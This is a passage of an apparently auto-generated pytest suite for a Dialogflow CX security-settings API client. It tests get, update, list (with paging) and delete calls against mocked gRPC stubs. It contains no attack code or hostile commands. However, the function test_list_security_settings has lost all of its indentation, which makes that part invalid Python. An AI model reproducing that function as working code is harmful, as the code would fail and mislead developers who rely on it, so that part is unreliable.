        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == security_settings.GetSecuritySettingsRequest()
    # Establish that the response is the type that we expect.
    assert isinstance(response, security_settings.SecuritySettings)
    assert response.name == 'name_value'
    assert response.display_name == 'display_name_value'
    assert response.redaction_strategy == security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE
    assert response.redaction_scope == security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE
    assert response.inspect_template == 'inspect_template_value'
    assert response.deidentify_template == 'deidentify_template_value'
    assert response.purge_data_types == [security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY]
@pytest.mark.asyncio
async def test_get_security_settings_async_from_dict():
    """Re-run the async GetSecuritySettings test with a dict request."""
    await test_get_security_settings_async(request_type=dict)
def test_get_security_settings_field_headers():
    """The routing header x-goog-request-params must carry the request's name field (sync)."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = security_settings.GetSecuritySettingsRequest()
    request.name = 'name/value'
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.get_security_settings),
            '__call__') as call:
        call.return_value = security_settings.SecuritySettings()
        client.get_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request
    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert (
        'x-goog-request-params',
        'name=name/value',
    ) in kw['metadata']
@pytest.mark.asyncio
async def test_get_security_settings_field_headers_async():
    """The routing header x-goog-request-params must carry the request's name field (async)."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = security_settings.GetSecuritySettingsRequest()
    request.name = 'name/value'
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.get_security_settings),
            '__call__') as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(security_settings.SecuritySettings())
        await client.get_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request
    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert (
        'x-goog-request-params',
        'name=name/value',
    ) in kw['metadata']
def test_get_security_settings_flattened():
    """Flattened (keyword-arg) invocation must populate the corresponding request fields (sync)."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.get_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        call.return_value = security_settings.SecuritySettings()
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.get_security_settings(
            name='name_value',
        )
        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0].name == 'name_value'
def test_get_security_settings_flattened_error():
    """Mixing a request object with flattened fields must raise ValueError (sync)."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        client.get_security_settings(
            security_settings.GetSecuritySettingsRequest(),
            name='name_value',
        )
@pytest.mark.asyncio
async def test_get_security_settings_flattened_async():
    """Flattened (keyword-arg) invocation must populate the corresponding request fields (async)."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.get_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call, wrapped in
        # a FakeUnaryUnaryCall so the async client can await it.
        # (A previous redundant plain-message assignment was removed; it
        # was immediately overwritten and had no effect.)
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(security_settings.SecuritySettings())
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        response = await client.get_security_settings(
            name='name_value',
        )
        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0].name == 'name_value'
@pytest.mark.asyncio
async def test_get_security_settings_flattened_error_async():
    """Mixing a request object with flattened fields must raise ValueError (async)."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        await client.get_security_settings(
            security_settings.GetSecuritySettingsRequest(),
            name='name_value',
        )
def test_update_security_settings(transport: str = 'grpc', request_type=gcdc_security_settings.UpdateSecuritySettingsRequest):
    """UpdateSecuritySettings (sync): the stub is called once with the request and the response fields round-trip."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
        transport=transport,
    )
    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.update_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        call.return_value = gcdc_security_settings.SecuritySettings(
            name='name_value',
            display_name='display_name_value',
            redaction_strategy=gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE,
            redaction_scope=gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE,
            inspect_template='inspect_template_value',
            deidentify_template='deidentify_template_value',
            purge_data_types=[gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY],
            retention_window_days=2271,
        )
        response = client.update_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == gcdc_security_settings.UpdateSecuritySettingsRequest()
    # Establish that the response is the type that we expect.
    assert isinstance(response, gcdc_security_settings.SecuritySettings)
    assert response.name == 'name_value'
    assert response.display_name == 'display_name_value'
    assert response.redaction_strategy == gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE
    assert response.redaction_scope == gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE
    assert response.inspect_template == 'inspect_template_value'
    assert response.deidentify_template == 'deidentify_template_value'
    assert response.purge_data_types == [gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY]
def test_update_security_settings_from_dict():
    """Re-run the sync UpdateSecuritySettings test with a dict request to exercise the dict-coercion path."""
    test_update_security_settings(request_type=dict)
def test_update_security_settings_empty_call():
    """Calling with no arguments must still send a default UpdateSecuritySettingsRequest."""
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
        transport='grpc',
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.update_security_settings),
            '__call__') as call:
        client.update_security_settings()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == gcdc_security_settings.UpdateSecuritySettingsRequest()
@pytest.mark.asyncio
async def test_update_security_settings_async(transport: str = 'grpc_asyncio', request_type=gcdc_security_settings.UpdateSecuritySettingsRequest):
    """UpdateSecuritySettings (async): the stub is awaited with the request and the response fields round-trip."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
        transport=transport,
    )
    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.update_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        # Wrapped in FakeUnaryUnaryCall so the async client can await it.
        call.return_value =grpc_helpers_async.FakeUnaryUnaryCall(gcdc_security_settings.SecuritySettings(
            name='name_value',
            display_name='display_name_value',
            redaction_strategy=gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE,
            redaction_scope=gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE,
            inspect_template='inspect_template_value',
            deidentify_template='deidentify_template_value',
            purge_data_types=[gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY],
        ))
        response = await client.update_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == gcdc_security_settings.UpdateSecuritySettingsRequest()
    # Establish that the response is the type that we expect.
    assert isinstance(response, gcdc_security_settings.SecuritySettings)
    assert response.name == 'name_value'
    assert response.display_name == 'display_name_value'
    assert response.redaction_strategy == gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE
    assert response.redaction_scope == gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE
    assert response.inspect_template == 'inspect_template_value'
    assert response.deidentify_template == 'deidentify_template_value'
    assert response.purge_data_types == [gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY]
@pytest.mark.asyncio
async def test_update_security_settings_async_from_dict():
    """Re-run the async UpdateSecuritySettings test with a dict request."""
    await test_update_security_settings_async(request_type=dict)
def test_update_security_settings_field_headers():
    """The routing header x-goog-request-params must carry security_settings.name (sync)."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = gcdc_security_settings.UpdateSecuritySettingsRequest()
    request.security_settings.name = 'security_settings.name/value'
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.update_security_settings),
            '__call__') as call:
        call.return_value = gcdc_security_settings.SecuritySettings()
        client.update_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request
    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert (
        'x-goog-request-params',
        'security_settings.name=security_settings.name/value',
    ) in kw['metadata']
@pytest.mark.asyncio
async def test_update_security_settings_field_headers_async():
    """The routing header x-goog-request-params must carry security_settings.name (async)."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = gcdc_security_settings.UpdateSecuritySettingsRequest()
    request.security_settings.name = 'security_settings.name/value'
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.update_security_settings),
            '__call__') as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gcdc_security_settings.SecuritySettings())
        await client.update_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request
    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert (
        'x-goog-request-params',
        'security_settings.name=security_settings.name/value',
    ) in kw['metadata']
def test_update_security_settings_flattened():
    """Flattened (keyword-arg) invocation must populate security_settings and update_mask (sync)."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.update_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        call.return_value = gcdc_security_settings.SecuritySettings()
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.update_security_settings(
            security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
            update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
        )
        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0].security_settings == gcdc_security_settings.SecuritySettings(name='name_value')
        assert args[0].update_mask == field_mask_pb2.FieldMask(paths=['paths_value'])
def test_update_security_settings_flattened_error():
    """Mixing a request object with flattened fields must raise ValueError (sync)."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        client.update_security_settings(
            gcdc_security_settings.UpdateSecuritySettingsRequest(),
            security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
            update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
        )
@pytest.mark.asyncio
async def test_update_security_settings_flattened_async():
    """Flattened (keyword-arg) invocation must populate security_settings and update_mask (async)."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.update_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call, wrapped in
        # a FakeUnaryUnaryCall so the async client can await it.
        # (A previous redundant plain-message assignment was removed; it
        # was immediately overwritten and had no effect.)
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gcdc_security_settings.SecuritySettings())
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        response = await client.update_security_settings(
            security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
            update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
        )
        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0].security_settings == gcdc_security_settings.SecuritySettings(name='name_value')
        assert args[0].update_mask == field_mask_pb2.FieldMask(paths=['paths_value'])
@pytest.mark.asyncio
async def test_update_security_settings_flattened_error_async():
    """Mixing a request object with flattened fields must raise ValueError (async)."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        await client.update_security_settings(
            gcdc_security_settings.UpdateSecuritySettingsRequest(),
            security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
            update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
        )
def test_list_security_settings(transport: str = 'grpc', request_type=security_settings.ListSecuritySettingsRequest):
client = SecuritySettingsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_security_settings),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = security_settings.ListSecuritySettingsResponse(
next_page_token='next_page_token_value',
)
response = client.list_security_settings(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == security_settings.ListSecuritySettingsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListSecuritySettingsPager)
assert response.next_page_token == 'next_page_token_value'
def test_list_security_settings_from_dict():
    """Re-run the request-type test with a dict request to cover coercion."""
    test_list_security_settings(request_type=dict)
def test_list_security_settings_empty_call():
    """A call with no request and no flattened fields still reaches the stub."""
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
        transport='grpc',
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.list_security_settings),
            '__call__') as call:
        client.list_security_settings()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == security_settings.ListSecuritySettingsRequest()
@pytest.mark.asyncio
async def test_list_security_settings_async(transport: str = 'grpc_asyncio', request_type=security_settings.ListSecuritySettingsRequest):
    """Async variant of the basic list test: the stub response must be wrapped
    in FakeUnaryUnaryCall so it can be awaited by the async client."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
        transport=transport,
    )
    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.list_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        call.return_value =grpc_helpers_async.FakeUnaryUnaryCall(security_settings.ListSecuritySettingsResponse(
            next_page_token='next_page_token_value',
        ))
        response = await client.list_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == security_settings.ListSecuritySettingsRequest()
    # Establish that the response is the type that we expect.
    assert isinstance(response, pagers.ListSecuritySettingsAsyncPager)
    assert response.next_page_token == 'next_page_token_value'
@pytest.mark.asyncio
async def test_list_security_settings_async_from_dict():
    """Re-run the async request-type test with a dict request."""
    await test_list_security_settings_async(request_type=dict)
def test_list_security_settings_field_headers():
    """Routing fields in the request must be echoed as x-goog-request-params."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = security_settings.ListSecuritySettingsRequest()
    request.parent = 'parent/value'
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.list_security_settings),
            '__call__') as call:
        call.return_value = security_settings.ListSecuritySettingsResponse()
        client.list_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request
    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert (
        'x-goog-request-params',
        'parent=parent/value',
    ) in kw['metadata']
@pytest.mark.asyncio
async def test_list_security_settings_field_headers_async():
    """Async variant: routing fields must be echoed as x-goog-request-params."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = security_settings.ListSecuritySettingsRequest()
    request.parent = 'parent/value'
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.list_security_settings),
            '__call__') as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(security_settings.ListSecuritySettingsResponse())
        await client.list_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request
    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert (
        'x-goog-request-params',
        'parent=parent/value',
    ) in kw['metadata']
def test_list_security_settings_flattened():
    """Flattened keyword arguments must be folded into the request message."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.list_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        call.return_value = security_settings.ListSecuritySettingsResponse()
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.list_security_settings(
            parent='parent_value',
        )
        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0].parent == 'parent_value'
def test_list_security_settings_flattened_error():
    """Mixing a request object with flattened arguments must raise."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # A request message plus flattened keyword fields is ambiguous, so the
    # client rejects the combination with ValueError.
    request = security_settings.ListSecuritySettingsRequest()
    with pytest.raises(ValueError):
        client.list_security_settings(
            request,
            parent='parent_value',
        )
@pytest.mark.asyncio
async def test_list_security_settings_flattened_async():
    """Flattened kwargs must be folded into the request (async client)."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.list_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.  Only the
        # awaitable FakeUnaryUnaryCall wrapper is needed; the previous bare
        # response assignment was immediately overwritten (dead code).
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(security_settings.ListSecuritySettingsResponse())
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        response = await client.list_security_settings(
            parent='parent_value',
        )
        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0].parent == 'parent_value'
@pytest.mark.asyncio
async def test_list_security_settings_flattened_error_async():
    """Mixing a request object with flattened arguments must raise (async)."""
    async_client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # A request message plus flattened keyword fields is ambiguous.
    request = security_settings.ListSecuritySettingsRequest()
    with pytest.raises(ValueError):
        await async_client.list_security_settings(
            request,
            parent='parent_value',
        )
def test_list_security_settings_pager():
    """The sync pager must walk every page transparently (6 items total)."""
    client = SecuritySettingsServiceClient(
        # Fixed: pass a credentials *instance*, not the class, consistent
        # with every other test in this file.
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.list_security_settings),
            '__call__') as call:
        # Set the response to a series of pages.
        call.side_effect = (
            security_settings.ListSecuritySettingsResponse(
                security_settings=[
                    security_settings.SecuritySettings(),
                    security_settings.SecuritySettings(),
                    security_settings.SecuritySettings(),
                ],
                next_page_token='abc',
            ),
            security_settings.ListSecuritySettingsResponse(
                security_settings=[],
                next_page_token='def',
            ),
            security_settings.ListSecuritySettingsResponse(
                security_settings=[
                    security_settings.SecuritySettings(),
                ],
                next_page_token='ghi',
            ),
            security_settings.ListSecuritySettingsResponse(
                security_settings=[
                    security_settings.SecuritySettings(),
                    security_settings.SecuritySettings(),
                ],
            ),
            RuntimeError,
        )
        metadata = ()
        metadata = tuple(metadata) + (
            gapic_v1.routing_header.to_grpc_metadata((
                ('parent', ''),
            )),
        )
        pager = client.list_security_settings(request={})
        assert pager._metadata == metadata
        results = [i for i in pager]
        assert len(results) == 6
        assert all(isinstance(i, security_settings.SecuritySettings)
                   for i in results)
def test_list_security_settings_pages():
    """The .pages iterator must expose raw pages with their tokens in order."""
    client = SecuritySettingsServiceClient(
        # Fixed: pass a credentials *instance*, not the class, consistent
        # with every other test in this file.
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.list_security_settings),
            '__call__') as call:
        # Set the response to a series of pages.
        call.side_effect = (
            security_settings.ListSecuritySettingsResponse(
                security_settings=[
                    security_settings.SecuritySettings(),
                    security_settings.SecuritySettings(),
                    security_settings.SecuritySettings(),
                ],
                next_page_token='abc',
            ),
            security_settings.ListSecuritySettingsResponse(
                security_settings=[],
                next_page_token='def',
            ),
            security_settings.ListSecuritySettingsResponse(
                security_settings=[
                    security_settings.SecuritySettings(),
                ],
                next_page_token='ghi',
            ),
            security_settings.ListSecuritySettingsResponse(
                security_settings=[
                    security_settings.SecuritySettings(),
                    security_settings.SecuritySettings(),
                ],
            ),
            RuntimeError,
        )
        pages = list(client.list_security_settings(request={}).pages)
        for page_, token in zip(pages, ['abc','def','ghi', '']):
            assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_list_security_settings_async_pager():
    """The async pager must walk every page transparently (6 items total)."""
    client = SecuritySettingsServiceAsyncClient(
        # Fixed: pass a credentials *instance*, not the class, consistent
        # with every other test in this file.
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.list_security_settings),
            '__call__', new_callable=mock.AsyncMock) as call:
        # Set the response to a series of pages.
        call.side_effect = (
            security_settings.ListSecuritySettingsResponse(
                security_settings=[
                    security_settings.SecuritySettings(),
                    security_settings.SecuritySettings(),
                    security_settings.SecuritySettings(),
                ],
                next_page_token='abc',
            ),
            security_settings.ListSecuritySettingsResponse(
                security_settings=[],
                next_page_token='def',
            ),
            security_settings.ListSecuritySettingsResponse(
                security_settings=[
                    security_settings.SecuritySettings(),
                ],
                next_page_token='ghi',
            ),
            security_settings.ListSecuritySettingsResponse(
                security_settings=[
                    security_settings.SecuritySettings(),
                    security_settings.SecuritySettings(),
                ],
            ),
            RuntimeError,
        )
        async_pager = await client.list_security_settings(request={},)
        assert async_pager.next_page_token == 'abc'
        responses = []
        async for response in async_pager:
            responses.append(response)
        assert len(responses) == 6
        assert all(isinstance(i, security_settings.SecuritySettings)
                   for i in responses)
@pytest.mark.asyncio
async def test_list_security_settings_async_pages():
    """The async .pages iterator must expose raw pages with their tokens."""
    client = SecuritySettingsServiceAsyncClient(
        # Fixed: pass a credentials *instance*, not the class, consistent
        # with every other test in this file.
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.list_security_settings),
            '__call__', new_callable=mock.AsyncMock) as call:
        # Set the response to a series of pages.
        call.side_effect = (
            security_settings.ListSecuritySettingsResponse(
                security_settings=[
                    security_settings.SecuritySettings(),
                    security_settings.SecuritySettings(),
                    security_settings.SecuritySettings(),
                ],
                next_page_token='abc',
            ),
            security_settings.ListSecuritySettingsResponse(
                security_settings=[],
                next_page_token='def',
            ),
            security_settings.ListSecuritySettingsResponse(
                security_settings=[
                    security_settings.SecuritySettings(),
                ],
                next_page_token='ghi',
            ),
            security_settings.ListSecuritySettingsResponse(
                security_settings=[
                    security_settings.SecuritySettings(),
                    security_settings.SecuritySettings(),
                ],
            ),
            RuntimeError,
        )
        pages = []
        async for page_ in (await client.list_security_settings(request={})).pages:
            pages.append(page_)
        for page_, token in zip(pages, ['abc','def','ghi', '']):
            assert page_.raw_page.next_page_token == token
def test_delete_security_settings(transport: str = 'grpc', request_type=security_settings.DeleteSecuritySettingsRequest):
    """Exercise delete_security_settings over a mocked gRPC stub; the RPC
    returns Empty, surfaced to the caller as None."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
        transport=transport,
    )
    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.delete_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        call.return_value = None
        response = client.delete_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == security_settings.DeleteSecuritySettingsRequest()
    # Establish that the response is the type that we expect.
    assert response is None
def test_delete_security_settings_from_dict():
    """Re-run the request-type test with a dict request to cover coercion."""
    test_delete_security_settings(request_type=dict)
def test_delete_security_settings_empty_call():
    """A call with no request and no flattened fields still reaches the stub."""
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
        transport='grpc',
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.delete_security_settings),
            '__call__') as call:
        client.delete_security_settings()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == security_settings.DeleteSecuritySettingsRequest()
@pytest.mark.asyncio
async def test_delete_security_settings_async(transport: str = 'grpc_asyncio', request_type=security_settings.DeleteSecuritySettingsRequest):
    """Async variant of the delete test; the None result is wrapped in
    FakeUnaryUnaryCall so the async client can await it."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
        transport=transport,
    )
    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.delete_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
        response = await client.delete_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == security_settings.DeleteSecuritySettingsRequest()
    # Establish that the response is the type that we expect.
    assert response is None
@pytest.mark.asyncio
async def test_delete_security_settings_async_from_dict():
    """Re-run the async request-type test with a dict request."""
    await test_delete_security_settings_async(request_type=dict)
def test_delete_security_settings_field_headers():
    """Routing fields in the request must be echoed as x-goog-request-params."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = security_settings.DeleteSecuritySettingsRequest()
    request.name = 'name/value'
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.delete_security_settings),
            '__call__') as call:
        call.return_value = None
        client.delete_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request
    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert (
        'x-goog-request-params',
        'name=name/value',
    ) in kw['metadata']
@pytest.mark.asyncio
async def test_delete_security_settings_field_headers_async():
    """Async variant: routing fields must be echoed as x-goog-request-params."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = security_settings.DeleteSecuritySettingsRequest()
    request.name = 'name/value'
